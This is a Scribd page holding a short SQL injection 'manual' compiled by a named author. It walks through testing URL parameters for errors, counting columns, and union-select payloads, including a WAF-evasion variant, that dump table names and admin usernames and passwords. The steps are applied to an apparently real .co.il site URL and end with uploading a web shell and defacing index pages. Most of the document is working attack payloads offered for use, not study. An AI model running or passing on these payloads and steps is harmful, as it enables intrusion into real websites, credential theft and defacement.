Scribd
Upload
140 views2 pages

Sqli Manual

The document provides instructions for SQL injection vulnerabilities including checking for errors, exploiting vulnerable tables, and different payloads to retrieve usernames and passwords from an admin table. Examples show adding a payload to the end of a URL to extract this sensitive information.

Uploaded by

Hanif Ahmad Syauqi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
140 views2 pages

Sqli Manual

The document provides instructions for SQL injection vulnerabilities including checking for errors, exploiting vulnerable tables, and different payloads to retrieve usernames and passwords from an admin table. Examples show adding a payload to the end of a URL to extract this sensitive information.

Uploaded by

Hanif Ahmad Syauqi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

Vuln checker : %27 or ' at the end of url, if(syntax sql error>>vuln)

Keep going until error :+order+by+10--+-

Check for vuln tables :


-(php digit)+union+select+1,2,3,4,5,6,7,8,9,10--+-

Add exploit on the vuln number


=-(php digit)+union+select+1,EXPLOIT,3,4,5--+-

Exploit :

MadBlood DIOS :

(Select+export_set(5,@:=0,
(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@
,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

ZEN with WAF DIOS:

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/
(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/
())and(@)in(@:=CoNCat
%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

other exploit :

make_set(6,@:=0x0a,
(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_n
ame,column_name)),@)

Look up :

Add :

-(php digit)+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

Example :

www.situs.co.il/advertiser_view.php?id=-
77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Hash password>>search for admin panel>>login>>upload shell>>and then what ever you
want...

Changing for index???, don't forget to backup, except israel website

Compile by MRHZ
===========================
tbl_admin_login_t :admin_name
tbl_admin_login_t :user_name
tbl_admin_login_t :user_password

make_set(6,@:=0x0a,
(select(1)from(tbl_admin_login_t)where@:=make_set(511,@,0x3c6c693e,admin_name,user_
name,user_password)),@)

You might also like